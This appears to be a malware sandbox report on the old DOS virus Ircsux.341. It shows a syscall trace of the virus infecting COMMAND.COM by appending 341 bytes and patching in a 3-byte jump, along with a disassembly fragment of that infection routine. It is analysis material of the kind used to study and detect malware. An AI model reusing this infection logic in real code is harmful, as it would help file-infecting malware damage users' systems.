Sample viewer

vx.netlux.org/Virus.DOS.Ircsux.341

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:20.664170895Z 47 PC: 12aae | Get disk transfer address
2018-12-17T23:01:20.665603687Z 26 PC: 12abe | Set disk transfer address
2018-12-17T23:01:20.667032542Z 25 PC: 12acb | Get default drive
2018-12-17T23:01:20.66805307Z 14 PC: 12ad4 | Set default drive (Drive = 'C')
2018-12-17T23:01:20.669190537Z 78 PC: 12ae0 | Find first file
2018-12-17T23:01:20.674554406Z 67 PC: 12b1d | Get or set file attributes
2018-12-17T23:01:20.67905845Z 67 PC: 12b29 | Get or set file attributes
2018-12-17T23:01:21.09746179Z 61 PC: 12b31 | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:01:21.106093869Z 87 PC: 12b38 | Get or set file date and time
2018-12-17T23:01:21.108083057Z 44 PC: 12b44 | Get time
0x12b44: or dx, dx
0x12b46: je 0x12b40
0x12b48: mov word ptr [bp + 0x14e], dx
0x12b4c: mov ah, 0x3f
0x12b4e: lea dx, word ptr [bp + 0x63]
0x12b51: mov cx, 3
0x12b54: int 0x21
0x12b56: mov ax, 0x4202
0x12b59: xor cx, cx
0x12b5b: xor dx, dx
0x12b5d: int 0x21
0x12b5f: sub ax, 3
0x12b62: mov word ptr [0xfb2d], ax
0x12b65: mov byte ptr [0xfb2c], 0xe9
0x12b6a: lea si, word ptr [bp - 3]
0x12b6d: mov di, 0xfcbc
0x12b70: mov cx, 0x155
0x12b73: cld
0x12b74: rep movsb byte ptr es:[di], byte ptr [si]
0x12b76: mov si, 0xfcd8
2018-12-17T23:01:21.113403815Z 63 PC: 12b56 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:01:21.118032302Z 66 PC: 12b5f | Move file pointer
2018-12-17T23:01:21.120596791Z 64 PC: 12b86 | Write file or device (Write 341 bytes on handle 5)
2018-12-17T23:01:21.130751713Z 66 PC: 12b8f | Move file pointer
2018-12-17T23:01:21.132889951Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:01:21.137827178Z 87 PC: 12bac | Get or set file date and time
2018-12-17T23:01:21.140144943Z 62 PC: 12bb0 | Close file
2018-12-17T23:01:21.148013959Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T23:01:21.161887258Z 26 PC: 12bc9 | Set disk transfer address
2018-12-17T23:01:21.163598954Z 14 PC: 12bd2 | Set default drive (Drive = 'A')
2018-12-17T23:01:21.165444232Z 9 PC: 12a47 | Display string (String= 'IT'S HARD DROPPER - (C) 1994 by ?')